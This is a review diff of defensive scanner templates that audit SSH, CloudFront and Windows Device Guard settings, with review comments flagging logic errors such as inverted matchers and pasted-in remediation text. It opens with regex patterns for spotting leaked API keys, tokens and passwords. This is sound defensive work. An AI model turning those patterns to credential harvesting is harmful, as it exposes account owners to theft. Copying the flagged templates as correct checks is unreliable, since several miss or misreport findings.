(W(?:[a-f0-9]{32}(-us[0-9]{1,2}))a-zA-Z0-9) + part: body + - type: regex + name: mailgun_priv_key + regex: + - mailgun[_-]?priv[_-]?key(=| =|:| :) + part: body + - type: regex + name: mailgun_secret_api_key + regex: + - mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: master_password + regex: + - (master_password).+ + part: body + - type: regex + name: mg_public_api_key + regex: + - mg[_-]?public[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: mysql_root_password + regex: + - mysql[_-]?root[_-]?password(=| =|:| :) + part: body + - type: regex + name: netlify_api_key + regex: + - netlify[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: rabbitmq_password + regex: + - rabbitmq[_-]?password(=| =|:| :) + part: body + - type: regex + name: 
rediscloud_url + regex: + - rediscloud[_-]?url(=| =|:| :) + part: body + - type: regex + name: release_gh_token + regex: + - release[_-]?gh[_-]?token(=| =|:| :) + part: body + - type: regex + name: rubygems_auth_token + regex: + - rubygems[_-]?auth[_-]?token(=| =|:| :) + part: body + - type: regex + name: travis_secure_env_vars + regex: + - travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :) + part: body + - type: regex + name: travis_token + regex: + - travis[_-]?token(=| =|:| :) + part: body + - type: regex + name: twilio_api_key + regex: + - twilio[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: twilio_api_secret + regex: + - twilio[_-]?api[_-]?secret(=| =|:| :) + part: body + - type: regex + name: twilio_chat_account_api_service + regex: + - twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :) + part: body + - type: regex + name: twilio_token + regex: + - twilio[_-]?token(=| =|:| :) + part: body + - type: regex + name: twitter_consumer_key + regex: + - twitter[_-]?consumer[_-]?key(=| =|:| :) + part: body + - type: regex + name: twitter_consumer_secret + regex: + - twitter[_-]?consumer[_-]?secret(=| =|:| :) + part: body + - type: regex + name: twitteroauthaccesssecret + regex: + - twitteroauthaccesssecret(=| =|:| :) + part: body + - type: regex + name: twitteroauthaccesstoken + regex: + - twitteroauthaccesstoken(=| =|:| :) + part: body + - type: regex + name: urban_master_secret + regex: + - urban[_-]?master[_-]?secret(=| =|:| :) + part: body + - type: regex + name: use_ssh + regex: + - use[_-]?ssh(=| =|:| :) + part: body + - type: regex + name: user_assets_access_key_id + regex: + - user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :) + part: body + - type: regex + name: virustotal_apikey + regex: + - virustotal[_-]?apikey(=| =|:| :) + part: body diff --git a/poc/auth/ssh-key-auth-required.yaml b/poc/auth/ssh-key-auth-required.yaml new file mode 100644 index 0000000000..61496daad8 --- /dev/null +++ b/poc/auth/ssh-key-auth-required.yaml 
@@ -0,0 +1,23 @@
+id: ssh-key-auth-required
+
+info:
+ name: Use SSH Key-Based Authentication
+ author: pussycat0x
+ severity: info
+ description: |
+ SSH key-based authentication is more secure than password-based authentication.
+ remediation: |
+ Change it to : PasswordAuthentication no
+ reference:
+ - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f
+ - https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server
+ tags: audit,config,file,ssh
+
+file:
+ - extensions:
+ - all
+
+ matchers:
+ - type: word
+ words:
+ - "PasswordAuthentication yes"
diff --git a/poc/auth/webui-login.yaml b/poc/auth/webui-login.yaml
new file mode 100644
index 0000000000..6f3339ee58
--- /dev/null
+++ b/poc/auth/webui-login.yaml
@@ -0,0 +1,25 @@
+id: webui-login
+info:
+ name: Web UI Login Page Detection
+ author: drewvravick
+ severity: high
+ description: |
+ Detects the presence of a web UI login page.
+ tags:
+ - web
+ - login
+
+requests:
+ - name: Web UI Login Page
+ path:
+ - "{{BaseURL}}/webui/"
+ method: GET
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "cisco"
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/aws/cloudfront-compress-object.yaml b/poc/aws/cloudfront-compress-object.yaml
new file mode 100644
index 0000000000..39129bd982
--- /dev/null
+++ b/poc/aws/cloudfront-compress-object.yaml
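Review bot: The word matcher `- "PasswordAuthentication yes"` at the end of the ssh-key-auth-required hunk also fires on the commented-out `#PasswordAuthentication yes` that stock sshd_config files ship with, and misses `passwordauthentication Yes`, since sshd keywords and their yes/no values are case-insensitive; a line-anchored regex matcher is more accurate: `- type: regex` / `regex:` / `- '(?mi)^\s*PasswordAuthentication\s+yes\b'`. The template is also silent when the directive is absent entirely, which sshd treats as `yes`; that negative case cannot be expressed with a word or regex matcher and is worth stating in the description. With `extensions: all` the check runs on every file handed to the scanner, so the description should say it is meant to be pointed at sshd_config.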
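Review bot: `severity: high` in the webui-login hunk is not justified for a template that only detects a login page; a body match on `cisco` with a 200 status does not establish a vulnerability, so `severity: info` (or a description naming the product and why its exposure matters) would be consistent with the other detection templates in this batch. The word matcher is case-sensitive, so a page that only says `Cisco` is missed; `case-insensitive: true` on that matcher fixes it. `tags` is written as a YAML list here while the sibling templates use the comma-separated string form; aligning with the others keeps the batch uniform.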
@@ -0,0 +1,60 @@
+id: cloudfront-compress-object
+
+info:
+ name: CloudFront Compress Objects Automatically
+ author: DhiyaneshDK
+ severity: low
+ description: |
+ Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are configured to automatically compress content for web requests that include "Accept-Encoding: gzip" in the request header, in order to increase the websites/web applications performance and reduce bandwidth costs.
+ impact: |
+ Disabling "Compress Objects Automatically" in CloudFront can lead to increased data transfer costs and slower page load times, negatively impacting user experience and performance.
+ remediation: |
+ Enable "Compress Objects Automatically" in CloudFront to reduce data transfer sizes, enhance loading speeds, and improve overall performance for end users.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/compress-objects-automatically.html
+ - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html
+ tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let DistributionListItemsId of iterate(template.distributions)){
+ set("distribution", DistributionListItemsId)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+
+ source: |
+ aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
+
+ extractors:
+ - type: json
+ name: distributions
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+
+ source: |
+ aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].Compress' --region $region --output text
+
+ matchers:
+ - type: word
+ words:
+ - "False"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"'
\ No newline at end of file
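Review bot: The query in the second code block, `DistributionConfig.CacheBehaviors.Items[*].Compress`, only reads the additional cache behaviors; `DistributionConfig.DefaultCacheBehavior.Compress` is never inspected, so a distribution with only its default behavior (the common case) prints nothing and is never flagged even when compression is off. A multiselect such as `--query '[DistributionConfig.DefaultCacheBehavior.Compress, DistributionConfig.CacheBehaviors.Items[*].Compress]'` covers both; confirm the text rendering still yields a bare `False` before relying on it. The list command passes both `--output table` and `--output json`, and only the last one takes effect, so `--output table` is dead text; the same duplication appears in cloudfront-custom-certificates.yaml and cloudfront-geo-restriction.yaml. CloudFront is a global API, so the hard-coded `region: "us-west-2"` is presumably only the endpoint the CLI signs against and should not change results; a short comment on the variable saying so would save the next reader from asking.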
diff --git a/poc/aws/cloudfront-custom-certificates.yaml b/poc/aws/cloudfront-custom-certificates.yaml
new file mode 100644
index 0000000000..13e5123ef6
--- /dev/null
+++ b/poc/aws/cloudfront-custom-certificates.yaml
@@ -0,0 +1,60 @@
+id: cloudfront-custom-certificates
+
+info:
+ name: Cloudfront Custom SSL/TLS Certificates - In Use
+ author: DhiyaneshDK
+ severity: medium
+ description: |
+ Ensure that your Amazon CloudFront distributions are configured to use a custom SSL/TLS certificate instead of the default one.
+ impact: |
+ Failing to use custom SSL/TLS certificates in CloudFront can result in trust issues with end users, exposing your web content to man-in-the-middle attacks and potentially damaging your brand's reputation due to untrusted connection warnings.
+ remediation: |
+ Configure your Amazon CloudFront distribution to use custom SSL/TLS certificates to ensure secure and trusted connections for your users, enhancing data protection and maintaining brand integrity.
+ reference:
+ - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-distro-custom-tls.html
+ - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/CNAMEs.html
+ tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config
+
+variables:
+ region: "us-west-2"
+
+flow: |
+ code(1)
+ for(let DistributionListItemsId of iterate(template.distributions)){
+ set("distribution", DistributionListItemsId)
+ code(2)
+ }
+
+self-contained: true
+
+code:
+ - engine:
+ - sh
+ - bash
+
+ source: |
+ aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json
+
+ extractors:
+ - type: json
+ name: distributions
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+
+ source: |
+ aws cloudfront get-distribution --region $region --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.CloudFrontDefaultCertificate' --output text
+
+ matchers:
+ - type: word
+ words:
+ - "False"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Cloudfront Custom SSL/TLS Certificates " + distribution + " In Use"'
\ No newline at end of file
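Review bot: The matcher `- "False"` reports the compliant state: `CloudFrontDefaultCertificate` is `False` exactly when a custom certificate is configured, so a distribution still on the default certificate prints `True` and is never flagged, while the impact and remediation text and `severity: medium` describe the default certificate as the finding. Either match `"True"` and change the output to something like `- '"CloudFront Default SSL/TLS Certificate " + distribution + " In Use"'`, or keep the current logic and drop to `severity: info` with a description that says it enumerates custom-certificate distributions. The certificate is read via `get-distribution` here while the sibling templates use `get-distribution-config`; both expose the same `DistributionConfig`, so that is a consistency point only.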
diff --git a/poc/aws/cloudfront-geo-restriction.yaml b/poc/aws/cloudfront-geo-restriction.yaml
new file mode 100644
index 0000000000..7ae37b5966
--- /dev/null
+++ b/poc/aws/cloudfront-geo-restriction.yaml
@@ -0,0 +1,60 @@ +id: cloudfront-geo-restriction + +info: + name: CloudFront Geo Restriction - Not Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that geographic restriction is enabled for your Amazon CloudFront CDN distributions in order to allow or block viewers from specific locations (countries) from accessing your web content. + impact: | + Not enabling Geo Restriction in CloudFront exposes content to users from unauthorized regions, increasing the risk of content misuse, compliance violations, and potential security threats. + remediation: | + Enable Geo Restriction in CloudFront to control access to content based on geographic locations, ensuring only authorized users from designated regions can access specific resources. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/geo-restriction.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query "DistributionConfig.Restrictions.GeoRestriction.RestrictionType" --region $region --output text + + matchers: + - type: word + words: + - "none" + + extractors: + - type: dsl + dsl: + - '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"' \ No newline at end of file 
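Review bot: The extractor message in the second code step is copied from the compress-objects template: a distribution whose `RestrictionType` is `none` is reported as `CloudFront Compress Objects Automatically <id> is Disabled`, which will be confused with the compression check added in the same batch. It should read `'"CloudFront Geo Restriction " + distribution + " is not Enabled"'` so the finding matches the template name. Since `none` is the AWS default and whether it is a finding depends on the content's intended audience, consider stating in `description` that this is a policy check rather than a vulnerability.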
diff --git a/poc/aws/cloudfront-insecure-protocol.yaml b/poc/aws/cloudfront-insecure-protocol.yaml new file mode 100644 index 0000000000..bf0a22a7e6 --- /dev/null +++ b/poc/aws/cloudfront-insecure-protocol.yaml 
@@ -0,0 +1,60 @@ +id: cloudfront-insecure-protocol + +info: + name: CloudFront Insecure Origin SSL Protocols + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are not using insecure SSL protocols (i.e. SSLv3) for HTTPS communication between CloudFront edge locations and custom origins. + impact: | + Insecure SSL protocols for CloudFront origins can expose sensitive data to interception and compromise, increasing the risk of man-in-the-middle attacks. + remediation: | + Configure your CloudFront distribution to enforce the use of secure SSL/TLS protocols (TLS 1.2 or higher) for all origins and disable support for outdated protocols like SSLv3 and TLS 1.0/1.1. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-insecure-origin-ssl-protocols.html + - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginSslProtocols.Items | []' --region $region --output json + + matchers: + - type: word + words: + - "SSLv3" + + extractors: + - type: dsl + dsl: + - '"CloudFront Uses SSLv3 Protocol in" + distribution' \ No newline at end of file 
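Review bot: The matcher only flags `SSLv3` in `OriginSslProtocols`, but the `remediation` text in the same template says TLS 1.0/1.1 must also be disabled, so an origin configured with `TLSv1` or `TLSv1.1` passes silently. Because the command emits JSON, the quoted forms can be matched without `TLSv1` also hitting `TLSv1.2`: add `- '"TLSv1"'` and `- '"TLSv1.1"'` to `words` (OR-ed by default) and change the extractor message to say "allows a deprecated origin SSL/TLS protocol" rather than hard-coding `SSLv3`. The first command also passes both `--output table` and `--output json`; drop the former.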
diff --git a/poc/aws/cloudfront-integrated-waf.yaml b/poc/aws/cloudfront-integrated-waf.yaml new file mode 100644 index 0000000000..cbc2322d8d --- /dev/null +++ b/poc/aws/cloudfront-integrated-waf.yaml 
@@ -0,0 +1,66 @@ +id: cloudfront-integrated-waf + +info: + name: CloudFront Integrated With WAF + author: DhiyaneshDK + severity: medium + description: | + Ensure that all your Amazon CloudFront distributions are integrated with the Amazon Web Application Firewall (WAF) service to protect against application-layer attacks that can compromise the security of your websites/web applications or place unnecessary load on them + impact: | + Lack of integration between CloudFront and a Web Application Firewall (WAF) increases vulnerability to web-based attacks, including DDoS, SQL injection, and cross-site scripting (XSS). + remediation: | + Integrate CloudFront with an appropriate Web Application Firewall (WAF) to filter and monitor HTTP requests, providing enhanced protection against common web threats. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-integrated-with-waf.html + - http://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.WebACLId' --region $region --output json + + matchers-condition: and + matchers: + - type: word + words: + - '""' + + - type: word + words: + - 'arn:' + negative: true + + extractors: + - type: dsl + dsl: + - '"CloudFront Integrated With WAF " + distribution + " is Disabled"' \ No newline at end of 
file diff --git a/poc/aws/cloudfront-logging-disabled.yaml b/poc/aws/cloudfront-logging-disabled.yaml new file mode 100644 index 0000000000..318780aa25 --- /dev/null +++ b/poc/aws/cloudfront-logging-disabled.yaml 
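Review bot: The negative `arn:` matcher is redundant: the first matcher only succeeds when the JSON output is the literal empty string `""`, which cannot also contain an ARN, so `matchers-condition: and` adds no discrimination and the second matcher can be dropped. A non-empty `WebACLId` that is not an ARN (as far as I recall, WAF Classic associations use a plain ID) is correctly left unflagged by the first matcher alone. The `list-distributions` call passes both `--output table` and `--output json`; remove `--output table` since the last flag wins.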
@@ -0,0 +1,60 @@ +id: cloudfront-logging-disabled + +info: + name: Cloudfront Logging Disabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that access (standard) logging is enabled for your Amazon CloudFront distributions in order to track all viewer requests for the web content delivered through the Content Delivery Network (CDN). + impact: | + Disabling CloudFront logging reduces visibility into traffic patterns, hinders incident response and forensic analysis, compromises compliance efforts, and limits troubleshooting capabilities, increasing security risks. + remediation: | + Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-logging-enabled.html + - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Logging.Enabled' --region $region --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"Cloudfront Logging " + distribution + " is Disabled"' 
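Review bot: The `remediation` text was pasted from an EBS encryption template — it talks about encrypting EBS volumes and snapshots with KMS, which has nothing to do with CloudFront access logging and would mislead anyone acting on the finding. Replace it with something like `Enable standard (access) logging on the distribution, deliver the logs to a dedicated S3 bucket with a restrictive bucket policy, and retain them long enough to support incident response and forensics.` The check itself (`Logging.Enabled` printed as `False`) looks correct.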
diff --git a/poc/aws/cloudfront-origin-shield.yaml b/poc/aws/cloudfront-origin-shield.yaml new file mode 100644 index 0000000000..ba8aadf79c --- /dev/null +++ b/poc/aws/cloudfront-origin-shield.yaml 
@@ -0,0 +1,60 @@ +id: cloudfront-origin-shield + +info: + name: CloudFront Origin Shield - Not Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that the Origin Shield performance optimization feature is enabled for all your Amazon CloudFront distributions in order to help reduce the load on your distribution's origin, improve its availability, and reduce its operating costs. + impact: | + Not enabling CloudFront Origin Shield can lead to increased load on your origin server, higher latency, and greater costs due to more frequent requests during traffic spikes. + remediation: | + Enable CloudFront Origin Shield for your distributions to optimize cache efficiency, reduce load on your origin server, and improve content delivery performance during high traffic periods. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/enable-origin-shield.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/origin-shield.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.Origins.Items[*].OriginShield.Enabled' --region $region --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"CloudFront Origin Shield " + distribution + " not Enabled"' \ No newline at end of file 
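Review bot: The query `Origins.Items[*].OriginShield.Enabled` with `--output text` prints `None` for any origin that has no `OriginShield` block at all, which is the default state, so the `False` matcher misses exactly the distributions this check is meant to find. Add `- "None"` to `words` so an absent block is treated as disabled, and note in `description` that the text output is one line per distribution with one value per origin. Given that Origin Shield is a caching/performance feature, `severity: medium` and the security framing in `impact` are overstated; `info` or `low` would better reflect its risk.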
diff --git a/poc/aws/cloudfront-security-policy.yaml b/poc/aws/cloudfront-security-policy.yaml new file mode 100644 index 0000000000..cf82557056 --- /dev/null +++ b/poc/aws/cloudfront-security-policy.yaml 
@@ -0,0 +1,64 @@ +id: cloudfront-security-policy + +info: + name: CloudFront Security Policy + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon CloudFront distributions are using a security policy with minimum TLSv1.2 or TLSv1.3 and appropriate security ciphers for HTTPS viewer connections. + impact: | + Failing to use a security policy with a minimum of TLSv1.2 or TLSv1.3 and appropriate ciphers for HTTPS viewer connections in CloudFront can expose sensitive data to interception and reduce the overall security of your application. + remediation: | + Configure your Amazon CloudFront distributions to use a security policy that enforces a minimum of TLSv1.2 or TLSv1.3 and specifies secure ciphers for HTTPS viewer connections. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/security-policy.html + - https://aws.amazon.com/about-aws/whats-new/2017/09/amazon-cloudfront-now-lets-you-select-a-security-policy-with-minimum-tls-v1_1-1_2-and-security-ciphers-for-viewer-connections/ + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.MinimumProtocolVersion' --region $region --output json + + matchers: + - type: word + words: + - '"TLSv1"' + - '"TLSv1_2016"' + - '"TLSv1.1_2016"' + - '"TLSv1.2_2018"' + - '"TLSv1.2_2019"' + + extractors: + - type: dsl + dsl: + - 
'"CloudFront Uses Insecure Protocols " + distribution' \ No newline at end of file diff --git a/poc/aws/cloudfront-traffic-unencrypted.yaml b/poc/aws/cloudfront-traffic-unencrypted.yaml new file mode 100644 index 0000000000..33b3984bad --- /dev/null +++ b/poc/aws/cloudfront-traffic-unencrypted.yaml 
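Review bot: The matcher list treats `TLSv1.2_2018` and `TLSv1.2_2019` as insecure, yet the `description` and `remediation` say a minimum of TLSv1.2 is acceptable; both of those policies enforce TLS 1.2 as the floor, so every distribution on them is reported as "Uses Insecure Protocols" in contradiction with the template's own text. Either drop those two entries, or rename the finding to say the policy is not the current recommended one. Conversely `SSLv3` is still an accepted `MinimumProtocolVersion` value for older configurations and is missing from the list; add `- '"SSLv3"'`.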
@@ -0,0 +1,60 @@ +id: cloudfront-traffic-unencrypted + +info: + name: CloudFront Traffic To Origin Unencrypted + author: DhiyaneshDK + severity: medium + description: | + Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit. + impact: | + Unencrypted traffic between CloudFront and custom origins can expose sensitive data during transmission, leading to potential data breaches and non-compliance with encryption standards. + remediation: | + Ensure that all communications between your Amazon CloudFront distributions and custom origins are encrypted by configuring them to use HTTPS, thereby securing the delivery of web content and meeting compliance requirements for encryption in transit. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html + - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginProtocolPolicy' --region $region --output json + + matchers: + - type: word + words: + - '"http-only"' + + extractors: + - type: dsl + dsl: + - '"CloudFront " + 
distribution + " uses HTTP Only"' \ No newline at end of file diff --git a/poc/aws/cloudfront-viewer-policy.yaml b/poc/aws/cloudfront-viewer-policy.yaml new file mode 100644 index 0000000000..01cb7235c8 --- /dev/null +++ b/poc/aws/cloudfront-viewer-policy.yaml 
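Review bot: The check only flags `http-only`, but `match-viewer` also sends plaintext to the origin whenever a cache behavior accepts HTTP from viewers (`allow-all`), so a distribution with `match-viewer` plus a permissive viewer policy passes this check while still carrying unencrypted origin traffic. Consider matching `'"match-viewer"'` as well and wording the message as "may use HTTP to origin", or cross-referencing the viewer-policy result from the sibling template. S3 origins have no `CustomOriginConfig`, so the projection yields nothing for them, which is the desired behaviour and worth a one-line comment in the template.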
@@ -0,0 +1,60 @@ +id: cloudfront-viewer-policy + +info: + name: CloudFront Viewer Protocol Policy + author: DhiyaneshDK + severity: medium + description: | + Ensure that the communication between your Amazon CloudFront distribution and its viewers is encrypted using HTTPS in order to secure the delivery of your web content. + impact: | + Failing to enforce HTTPS for viewer connections in CloudFront can expose web content to interception and manipulation, compromising the security and integrity of sensitive data transmitted between users and the distribution + remediation: | + Configure your Amazon CloudFront distribution's viewer protocol policy to either redirect HTTP requests to HTTPS or require HTTPS connections exclusively, ensuring secure delivery of web content and protecting against potential data breaches. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/viewer-protocol-policy.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy' --output json --region $region + + matchers: + - type: word + words: + - '"allow-all"' + + extractors: + - type: dsl + dsl: + - '"CloudFront Viewer Policy " + distribution + " allows all"' \ No newline at end of file 
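Review bot: The query reads only `CacheBehaviors.Items[*].ViewerProtocolPolicy` and ignores `DefaultCacheBehavior.ViewerProtocolPolicy`, which is the behavior applied to every path not matched by an explicit cache behavior; a distribution with no extra behaviors returns `null` and an `allow-all` default policy is never reported. Change the query to something like `'[DistributionConfig.DefaultCacheBehavior.ViewerProtocolPolicy, DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy][]'` so both are inspected (the trailing `[]` flattens the nested list, if I have the JMESPath right). The first command has the same `--output table`/`--output json` duplication as the sibling templates.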
diff --git a/poc/config/device-guard-not-configured.yaml b/poc/config/device-guard-not-configured.yaml new file mode 100644 index 0000000000..c11879bcca --- /dev/null +++ b/poc/config/device-guard-not-configured.yaml @@ -0,0 +1,35 @@ +id: device-guard-not-configured + +info: + name: Device Guard Not Configured + author: princechaddha + severity: high + description: Verifies if Device Guard is not configured, reducing protection against unauthorized code execution. + impact: | + Not configuring Device Guard reduces the system's ability to block unauthorized code execution. + remediation: | + Configure Device Guard to enhance system protection. + tags: device-guard,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard + + matchers: + - type: regex + regex: + - 'SecurityServicesConfigured\s+:\s+\{0\}' + - 'SecurityServicesRunning\s+:\s+\{0\}' + - 'VirtualizationBasedSecurityStatus\s+:\s+0' + condition: or diff --git a/poc/config/k8s-liveness-probe-not-configured.yaml b/poc/config/k8s-liveness-probe-not-configured.yaml new file mode 100644 index 0000000000..9fb2e658b9 --- /dev/null +++ b/poc/config/k8s-liveness-probe-not-configured.yaml 
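Review bot: The matchers regex-parse the default formatted output of `Get-CimInstance`, and with `condition: or` a single `SecurityServicesConfigured : {0}` line fires even when `VirtualizationBasedSecurityStatus` reports VBS running; the three properties are not independent signals, and any change in line formatting (wrapping, localisation) silently breaks all three. Emit structured output instead, e.g. `Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard | Select-Object SecurityServicesConfigured,SecurityServicesRunning,VirtualizationBasedSecurityStatus | ConvertTo-Json -Compress`, and match on the JSON values. The `remediation` text ("Configure Device Guard to enhance system protection.") gives no actionable step; name the "Turn On Virtualization Based Security" Group Policy setting and which security services to select.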
